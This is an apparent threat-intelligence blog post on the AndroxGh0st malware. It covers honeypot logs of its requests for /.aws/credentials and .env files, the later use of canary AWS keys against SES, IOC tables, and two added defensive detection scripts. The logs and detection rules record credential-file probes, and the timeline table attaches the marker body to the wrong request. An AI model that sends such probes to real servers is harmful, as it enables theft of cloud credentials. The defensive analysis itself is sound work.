
AndroxGh0st – Stealing your AWS Key Pairs for Simple Email Service

AndroxGh0st is a family of malware written in Python that notoriously targets Laravel .env files. Since the inception of our new fleet of web honeypots deployed in December 2021, Sicehice has detected this activity and observed tens of thousands of requests with the HTTP POST body set to 0x[]=androxgh0st. Searching this string on GitHub yields various repositories, many of which help identify AWS secrets inadvertently exposed by the Laravel framework.

One feature of AndroxGh0st is the ability to search for exposed AWS credentials, specifically the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY identifiers. While individuals may mistakenly leak their key pairs to version control repositories such as GitHub, GitLab, or BitBucket, there is always the possibility of inadvertently leaking key pairs directly on web servers as well. AWS continually scans GitHub for AWS key pairs and automatically applies the AWS managed policy AWSCompromisedKeyQuarantine to key pairs that are committed to public repositories. This is a great step towards securing AWS environments; however, it is difficult to implement such a process on web servers all over the Internet.

We recently observed an attack chain where a threat actor leveraged AndroxGh0st to find and use AWS key pairs. 

On the evening of January 24, 2023, we configured an AWS canary token in our various honeypots. When a request is made to the sensor at https://<IP>/.aws/credentials, the server responds with a credentials file:


We then started to note the following requests to our sensors:

2023-01-25 02:18:33+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 07:42:24+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 09:15:07+00 109.237.97.180 POST /.aws/credentials 0x%5B%5D=androxgh0st Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 09:15:07+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 12:39:59+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

On January 25, 2023, we only noted requests from a single IP to /.aws/credentials with the androxgh0st string. At the time of writing, 109.237.97.180 (Hostglobal.plus – Moscow, Russia) is noted across eight sources in our detections.
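The requests above carry three observable indicators: the URL-encoded POST body that decodes to 0x[]=androxgh0st, the probe for /.aws/credentials (or a .env file), and the fixed Chrome/81 User-Agent. The following script, an added example that is not part of the original post or of any Sicehice tooling, parses honeypot log lines in the layout shown above, URL-decodes the body and tags each line with the rules it matches. The log lines embedded in it are constructed from the entries on this page plus one benign request; the assumption that a POST body is a single token containing "=" sitting between the path and the User-Agent is specific to this log format.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the requests on this page.
ANDROX_MARKER = "0x[]=androxgh0st"
ANDROX_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36")
SECRET_PATHS = ("/.aws/credentials",)

# Constructed sample log in the honeypot layout shown above:
# "<date> <time+tz> <ip> <method> <path> [<post body>] <user-agent>".
# The last line is a benign request added to show a non-match.
SAMPLE_LOG = """\
2023-01-25 02:18:33+00 109.237.97.180 GET /.aws/credentials Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 09:15:07+00 109.237.97.180 POST /.aws/credentials 0x%5B%5D=androxgh0st Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2022-11-29 23:16:22+00 185.83.146.154 POST /web/.env 0x%5B%5D=androxgh0st Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2023-01-25 10:00:00+00 198.51.100.7 GET /index.html Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/109.0
"""

# Assumption about this log format: an optional POST body is one whitespace-free
# token containing "=" that sits between the path and the User-Agent.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+)"
    r"(?: (?P<body>\S*=\S*))? (?P<ua>.*)$"
)


def parse_line(line):
    """Split one log line into its fields; the body is URL-decoded."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["body"] = unquote_plus(rec["body"]) if rec["body"] else ""
    return rec


def classify(rec):
    """Return the set of detection rules a parsed request matches."""
    rules = set()
    if rec["body"] == ANDROX_MARKER:
        rules.add("androxgh0st_marker")        # strong: the scanner's own tag
    if rec["path"] in SECRET_PATHS or rec["path"].endswith("/.env"):
        rules.add("secret_file_probe")         # medium: hunting for secrets
    if rec["ua"] == ANDROX_UA:
        rules.add("androxgh0st_user_agent")    # weak: only useful combined
    return rules


def analyze(log_text):
    """Tag every matching line; lines with no matching rule are dropped."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line.strip())
        if rec is None:
            continue
        rules = classify(rec)
        if rules:
            hits.append({"ts": rec["ts"], "ip": rec["ip"], "method": rec["method"],
                         "path": rec["path"], "rules": sorted(rules)})
    return hits


def marker_ips(hits):
    """Source IPs that sent the androxgh0st body, the highest-confidence signal."""
    return {h["ip"] for h in hits if "androxgh0st_marker" in h["rules"]}


if __name__ == "__main__":
    for h in analyze(SAMPLE_LOG):
        print(h["ts"], h["ip"], h["method"], h["path"], ",".join(h["rules"]))
    print("marker IPs:", sorted(marker_ips(analyze(SAMPLE_LOG))))
```

The User-Agent is deliberately the weakest rule: it is a stock Chrome 81 string, so on its own it only narrows a crowd, whereas the decoded body is the scanner identifying itself. Running the rules over decoded rather than raw bodies matters because the marker arrives as 0x%5B%5D=androxgh0st and a literal-string match on the raw line would miss any variant encoding.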

Shortly after implementing the canaries, we started noticing attempts to use the AWS key pairs, specifically AWS API calls to GetSendQuota. The first request occurred on January 25, 2023:

2023-01-25 14:26:56 185.83.146.154 aws-sdk-php/3.154.6 GuzzleHttp/7 eventName:'GetSendQuota'

185.83.146.154 (Netinternet Bilisim Teknolojileri, Turkey) has been observed in seven unique data sources since April 13, 2022. In our sensors, we most recently noted this IP making AndroxGh0st requests on November 29, 2022.
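A canary key pair only pays off if any use of it is turned into an alert. GetSendQuota is a Simple Email Service call, so it lands in CloudTrail like any other API call, with the access key ID, source IP and User-Agent attached. The script below is an added example, not code from the original post: it filters CloudTrail records for the canary key ID and reports the dwell time from the moment the decoy file was served (the 09:15:07 POST above) to the first API call (14:26:56). The records are constructed to mirror the event on this page plus one unrelated call; the canary key ID uses AWS's documented example value AKIAIOSFODNN7EXAMPLE as a placeholder, and the errorCode field assumes the canary user has no permissions, so the call is denied but still logged.

```python
import json
from datetime import datetime, timezone

# Placeholder canary key ID (AWS's documented example value, not a real key).
CANARY_KEY_IDS = {"AKIAIOSFODNN7EXAMPLE"}

# Time the honeypot served the decoy credentials file (the POST on this page).
SERVED_AT = datetime(2023, 1, 25, 9, 15, 7, tzinfo=timezone.utc)

# Constructed CloudTrail records: the first mirrors the GetSendQuota call on
# this page (denied, because the canary user has no permissions); the second
# is an unrelated call with a different, constructed key ID.
SAMPLE_TRAIL = json.loads("""
{"Records": [
  {"eventTime": "2023-01-25T14:26:56Z", "eventSource": "ses.amazonaws.com",
   "eventName": "GetSendQuota", "awsRegion": "us-east-1",
   "sourceIPAddress": "185.83.146.154",
   "userAgent": "aws-sdk-php/3.154.6 GuzzleHttp/7",
   "errorCode": "AccessDenied",
   "userIdentity": {"type": "IAMUser", "userName": "canary-user",
                    "accessKeyId": "AKIAIOSFODNN7EXAMPLE"}},
  {"eventTime": "2023-01-25T15:00:00Z", "eventSource": "s3.amazonaws.com",
   "eventName": "ListBuckets", "awsRegion": "us-east-1",
   "sourceIPAddress": "203.0.113.10",
   "userAgent": "aws-cli/2.9.0",
   "userIdentity": {"type": "IAMUser", "userName": "deploy",
                    "accessKeyId": "AKIAZZZZZZZZZZZZZZZZ"}}
]}
""")


def canary_alerts(trail, canary_key_ids):
    """Return one alert per CloudTrail record that used a canary access key.

    Any use counts, denied or not: the canary has no legitimate caller, so the
    attempt itself is the signal.
    """
    alerts = []
    for rec in trail.get("Records", []):
        key_id = rec.get("userIdentity", {}).get("accessKeyId")
        if key_id not in canary_key_ids:
            continue
        service = rec.get("eventSource", "?").split(".")[0]
        alerts.append({
            "time": datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
                            .replace(tzinfo=timezone.utc),
            "source_ip": rec.get("sourceIPAddress"),
            "api": f"{service}:{rec.get('eventName')}",
            "user_agent": rec.get("userAgent"),
            "denied": "errorCode" in rec,
            "key_id": key_id,
        })
    return alerts


def seconds_since_served(alert, served_at=SERVED_AT):
    """Dwell time between serving the decoy and the attacker's first API call."""
    return (alert["time"] - served_at).total_seconds()


if __name__ == "__main__":
    for a in canary_alerts(SAMPLE_TRAIL, CANARY_KEY_IDS):
        print(f"CANARY USED {a['api']} from {a['source_ip']} ua={a['user_agent']!r} "
              f"denied={a['denied']} after {seconds_since_served(a):.0f}s")
```

Matching on the access key ID rather than the user name is deliberate: an attacker who obtains the key pair never sees the IAM user name, but the key ID travels with every signed request and is what CloudTrail records. The dwell time (5h11m49s here) and the SDK in the User-Agent are the fields worth keeping in the alert, since they separate automated harvesting from a later hands-on check.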


Timeline:

| Timestamp (UTC) | Source IP | Action | Note |
|---|---|---|---|
| 2022-11-29 23:16:22 | 185.83.146.154 | POST /web/.env | data="0x%5B%5D=androxgh0st", User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" |
| 2023-01-25 02:18:33 | 109.237.97.180 | GET /.aws/credentials | User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" |
| 2023-01-25 07:42:24 | 109.237.97.180 | GET /.aws/credentials | User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" |
| 2023-01-25 09:15:07 | 109.237.97.180 | POST /.aws/credentials | User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" |
| 2023-01-25 09:15:07 | 109.237.97.180 | GET /.aws/credentials | data="0x%5B%5D=androxgh0st", User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" |
| 2023-01-25 12:39:59 | 109.237.97.180 | GET /.aws/credentials | User-Agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" |
| 2023-01-25 14:26:56 | 185.83.146.154 | eventName='GetSendQuota' | User-Agent="aws-sdk-php/3.154.6 GuzzleHttp/7" |
| 2023-02-08 10:19:27 | 185.83.146.154 | GET /.env | Seen by AbuseIPDB with the same User-Agent probing .env files: `185.83.146.154 - - [08/Feb/2023:07:19:27 -0300] "GET /.env HTTP/1.1" 403 433 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"` |


IOCs:

| IOC | Description |
|---|---|
| 185.83.146.154 | IP invoking GetSendQuota API calls and requests for the /.aws/credentials file |
| 109.237.97.180 | IP invoking requests for the /.aws/credentials file |
| Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 | User-Agent associated with AndroxGh0st events |
| aws-sdk-php/3.154.6 GuzzleHttp/7 | User-Agent associated with GetSendQuota API calls |


We have also set up an AndroxGh0st VirusTotal collection to share IP addresses invoking AndroxGh0st related requests: https://www.virustotal.com/gui/collection/4495e3df98c7ac11194fa7217421c2f00eec84e7d3a0c8b2a4ab80ba2298bc89
